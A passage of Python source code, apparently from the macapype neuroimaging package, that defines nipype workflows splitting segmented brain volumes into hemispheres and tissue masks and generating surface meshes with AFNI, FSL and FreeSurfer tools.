                            calc_GM_nocb_R_hemi, "in_file_a")

    calc_WM_nocb_R_hemi = pe.Node(interface=afni.Calc(),
                                  name='calc_WM_nocb_R_hemi')
    calc_WM_nocb_R_hemi.inputs.expr = 'iszero(a-3)'
    calc_WM_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(calc_nocb_R_hemi, 'out_file',
                            calc_WM_nocb_R_hemi, "in_file_a")

    # Extract Cerebellum using template mask transformed to subject space
    extract_cereb = pe.Node(interface=afni.Calc(), name='extract_cereb')
    extract_cereb.inputs.expr = 'a*b/b'
    extract_cereb.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 't1_ref_file',
                            extract_cereb, "in_file_a")
    split_hemi_pipe.connect(align_cereb, 'out_file',
                            extract_cereb, "in_file_b")

    # Extract L.GM using template mask transformed to subject space
    extract_L_GM = pe.Node(interface=afni.Calc(), name='extract_L_GM')
    extract_L_GM.inputs.expr = 'a*b/b'
    extract_L_GM.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 't1_ref_file',
                            extract_L_GM, "in_file_a")
    split_hemi_pipe.connect(calc_GM_nocb_L_hemi, 'out_file',
                            extract_L_GM, "in_file_b")

    # Extract L.WM using template mask transformed to subject space
    extract_L_WM = pe.Node(interface=afni.Calc(), name='extract_L_WM')
    extract_L_WM.inputs.expr = 'a*b/b'
    extract_L_WM.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 't1_ref_file',
                            extract_L_WM, "in_file_a")
    split_hemi_pipe.connect(calc_WM_nocb_L_hemi, 'out_file',
                            extract_L_WM, "in_file_b")

    # Extract R.GM using template mask transformed to subject space
    extract_R_GM = pe.Node(interface=afni.Calc(), name='extract_R_GM')
    extract_R_GM.inputs.expr = 'a*b/b'
    extract_R_GM.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 't1_ref_file',
                            extract_R_GM, "in_file_a")
    split_hemi_pipe.connect(calc_GM_nocb_R_hemi, 'out_file',
                            extract_R_GM, "in_file_b")

    # Extract R.WM using template mask transformed to subject space
    extract_R_WM = pe.Node(interface=afni.Calc(), name='extract_R_WM')
    extract_R_WM.inputs.expr = 'a*b/b'
    extract_R_WM.inputs.outputtype = 'NIFTI_GZ'

    split_hemi_pipe.connect(inputnode, 't1_ref_file',
                            extract_R_WM, "in_file_a")
    split_hemi_pipe.connect(calc_WM_nocb_R_hemi, 'out_file',
                            extract_R_WM, "in_file_b")
    return split_hemi_pipe
def create_nii_to_mesh_pipe(params, params_template, name="nii_to_mesh_pipe"):
    """
    Description: basic nii to mesh pipeline after segmentation

    Processing steps:

    - split in hemispheres after removal of the subcortical structures
    - using scipy marching cube methods to compute mesh
    - some smoothing (using brain-slam)

    Params:

    - split_hemi_pipe (see :class:`_create_split_hemi_pipe \
    <macapype.pipelines.surface._create_split_hemi_pipe>` for arguments)
    - mesh_L_GM, mesh_R_GM, mesh_L_WM, mesh_R_WM (see :class:`Meshify \
    <macapype.nodes.surface.Meshify>` for arguments)

    Inputs:

        inputnode:

            warpinv_file:
                non-linear transformation (from NMT_subject_align)

            inv_transfo_file:
                inverse transformation

            aff_file:
                affine transformation file

            t1_ref_file:
                preprocessd T1

            segmented_file:
                from atropos segmentation, with all the tissues segmented

        arguments:

            params:
                dictionary of node sub-parameters (from a json file)

            name:
                pipeline name (default = "nii_to_mesh_pipe")

    Outputs:

    """
    # creating pipeline
    mesh_to_seg_pipe = pe.Workflow(name=name)

    # creating inputnode
    inputnode = pe.Node(
        niu.IdentityInterface(fields=['warpinv_file',
                                      'inv_transfo_file',
                                      'aff_file',
                                      't1_ref_file',
                                      'segmented_file']),
        name='inputnode')

    # split hemi pipe (+ cerebellum): produces per-hemisphere GM/WM volumes
    split_hemi_pipe = _create_split_hemi_pipe(
        params=parse_key(params, "split_hemi_pipe"),
        params_template=params_template)

    # forward every pipeline input to the sub-pipeline
    mesh_to_seg_pipe.connect(inputnode, 'warpinv_file',
                             split_hemi_pipe, 'inputnode.warpinv_file')
    mesh_to_seg_pipe.connect(inputnode, 'inv_transfo_file',
                             split_hemi_pipe, 'inputnode.inv_transfo_file')
    mesh_to_seg_pipe.connect(inputnode, 'aff_file',
                             split_hemi_pipe, 'inputnode.aff_file')
    mesh_to_seg_pipe.connect(inputnode, 't1_ref_file',
                             split_hemi_pipe, 'inputnode.t1_ref_file')
    mesh_to_seg_pipe.connect(inputnode, 'segmented_file',
                             split_hemi_pipe, 'inputnode.segmented_file')

    # meshify L GM hemisphere
    mesh_L_GM = NodeParams(interface=Meshify(),
                           params=parse_key(params, "mesh_L_GM"),
                           name="mesh_L_GM")

    mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_L_GM.out_file',
                             mesh_L_GM, "image_file")

    # meshify R GM hemisphere
    mesh_R_GM = NodeParams(interface=Meshify(),
                           params=parse_key(params, "mesh_R_GM"),
                           name="mesh_R_GM")

    mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_R_GM.out_file',
                             mesh_R_GM, "image_file")

    # meshify L WM hemisphere
    mesh_L_WM = NodeParams(interface=Meshify(),
                           params=parse_key(params, "mesh_L_WM"),
                           name="mesh_L_WM")

    mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_L_WM.out_file',
                             mesh_L_WM, "image_file")

    # meshify R WM hemisphere
    mesh_R_WM = NodeParams(interface=Meshify(),
                           params=parse_key(params, "mesh_R_WM"),
                           name="mesh_R_WM")

    mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_R_WM.out_file',
                             mesh_R_WM, "image_file")
    return mesh_to_seg_pipe
###############################################################################
# using freesurfer tools to build the mesh through tesselation
def create_nii_to_mesh_fs_pipe(params, name="nii_to_mesh_fs_pipe"):
    """
    Description: surface generation using freesurfer tools

    Processing steps: fill the WM mask, conform both volumes to the
    FreeSurfer mgz format, pretesselate, tesselate each hemisphere
    (WM fill labels: 255 = left, 127 = right), keep the main connected
    component, and smooth the resulting surfaces.

    Params:

    - fill_wm (see `MRIFill <https://nipype.readthedocs.io/en/0.12.1/\
    interfaces/generated/nipype.interfaces.freesurfer.utils.html#mrifill>`_) \
    - also available as :ref:`indiv_params <indiv_params>`

    Inputs:

        inputnode:

            wm_mask_file:
                segmented white matter mask (binary) in template space

            reg_brain_file:
                preprocessd T1, registered to template

            indiv_params (opt):
                dict with individuals parameters for some nodes

        arguments:

            params:
                dictionary of node sub-parameters (from a json file)

            name:
                pipeline name (default = "nii_to_mesh_fs_pipe")

    Outputs:

    """
    # creating pipeline
    nii_to_mesh_fs_pipe = pe.Workflow(name=name)

    # creating inputnode
    inputnode = pe.Node(
        niu.IdentityInterface(fields=['wm_mask_file', 'reg_brain_file',
                                      'indiv_params']),
        name='inputnode')

    # bin_wm: fill holes in the binary white matter mask
    bin_wm = pe.Node(interface=fsl.UnaryMaths(), name="bin_wm")
    bin_wm.inputs.operation = "fillh"

    nii_to_mesh_fs_pipe.connect(inputnode, 'wm_mask_file',
                                bin_wm, 'in_file')

    # resample everything to 1 mm isotropic, keeping the volume center
    refit_wm = pe.Node(interface=afni.Refit(), name="refit_wm")
    refit_wm.inputs.args = "-xdel 1.0 -ydel 1.0 -zdel 1.0 -keepcen"

    nii_to_mesh_fs_pipe.connect(bin_wm, 'out_file',
                                refit_wm, 'in_file')

    # resample everything
    refit_reg = pe.Node(interface=afni.Refit(), name="refit_reg")
    refit_reg.inputs.args = "-xdel 1.0 -ydel 1.0 -zdel 1.0 -keepcen"

    nii_to_mesh_fs_pipe.connect(inputnode, 'reg_brain_file',
                                refit_reg, 'in_file')

    # mri_convert wm to freesurfer mgz
    convert_wm = pe.Node(interface=fs.MRIConvert(),
                         name="convert_wm")
    convert_wm.inputs.out_type = "mgz"
    convert_wm.inputs.conform = True

    nii_to_mesh_fs_pipe.connect(refit_wm, 'out_file',
                                convert_wm, 'in_file')

    # mri_convert reg to freesurfer mgz
    convert_reg = pe.Node(interface=fs.MRIConvert(),
                          name="convert_reg")
    convert_reg.inputs.out_type = "mgz"
    convert_reg.inputs.conform = True

    nii_to_mesh_fs_pipe.connect(refit_reg, 'out_file',
                                convert_reg, 'in_file')

    # mri_fill (parameters can be overridden per subject via indiv_params)
    fill_wm = NodeParams(interface=fs.MRIFill(),
                         params=parse_key(params, "fill_wm"),
                         name="fill_wm")
    fill_wm.inputs.out_file = "filled.mgz"

    nii_to_mesh_fs_pipe.connect(convert_wm, 'out_file',
                                fill_wm, 'in_file')

    nii_to_mesh_fs_pipe.connect(
        inputnode, ("indiv_params", parse_key, "fill_wm"),
        fill_wm, 'indiv_params')

    # pretesselate wm
    pretess_wm = pe.Node(interface=fs.MRIPretess(),
                         name="pretess_wm")
    pretess_wm.inputs.label = 255

    nii_to_mesh_fs_pipe.connect(fill_wm, 'out_file',
                                pretess_wm, 'in_filled')
    nii_to_mesh_fs_pipe.connect(convert_reg, 'out_file',
                                pretess_wm, 'in_norm')

    # tesselate wm lh (mri_fill labels the left hemisphere 255)
    tess_wm_lh = pe.Node(interface=fs.MRITessellate(), name="tess_wm_lh")
    tess_wm_lh.inputs.label_value = 255
    tess_wm_lh.inputs.out_file = "lh_tess"

    nii_to_mesh_fs_pipe.connect(pretess_wm, 'out_file',
                                tess_wm_lh, 'in_file')

    # tesselate wm rh (mri_fill labels the right hemisphere 127)
    tess_wm_rh = pe.Node(interface=fs.MRITessellate(), name="tess_wm_rh")
    tess_wm_rh.inputs.label_value = 127
    tess_wm_rh.inputs.out_file = "rh_tess"

    nii_to_mesh_fs_pipe.connect(pretess_wm, 'out_file',
                                tess_wm_rh, 'in_file')

    # ExtractMainComponent lh: drop disconnected surface fragments
    extract_mc_lh = pe.Node(interface=fs.ExtractMainComponent(),
                            name="extract_mc_lh")

    nii_to_mesh_fs_pipe.connect(tess_wm_lh, 'surface',
                                extract_mc_lh, 'in_file')
    extract_mc_lh.inputs.out_file = "lh.lh_tess.maincmp"

    # ExtractMainComponent rh
    extract_mc_rh = pe.Node(interface=fs.ExtractMainComponent(),
                            name="extract_mc_rh")

    nii_to_mesh_fs_pipe.connect(tess_wm_rh, 'surface',
                                extract_mc_rh, 'in_file')
    extract_mc_rh.inputs.out_file = "rh.rh_tess.maincmp"

    # SmoothTessellation lh
    smooth_tess_lh = pe.Node(interface=fs.SmoothTessellation(),
                             name="smooth_tess_lh")
    smooth_tess_lh.inputs.disable_estimates = True

    nii_to_mesh_fs_pipe.connect(extract_mc_lh, 'out_file',
                                smooth_tess_lh, 'in_file')

    # SmoothTessellation rh
    smooth_tess_rh = pe.Node(interface=fs.SmoothTessellation(),
                             name="smooth_tess_rh")
    smooth_tess_rh.inputs.disable_estimates = True

    nii_to_mesh_fs_pipe.connect(extract_mc_rh, 'out_file',
                                smooth_tess_rh, 'in_file')
    return nii_to_mesh_fs_pipe
| 2.03125 | 2 |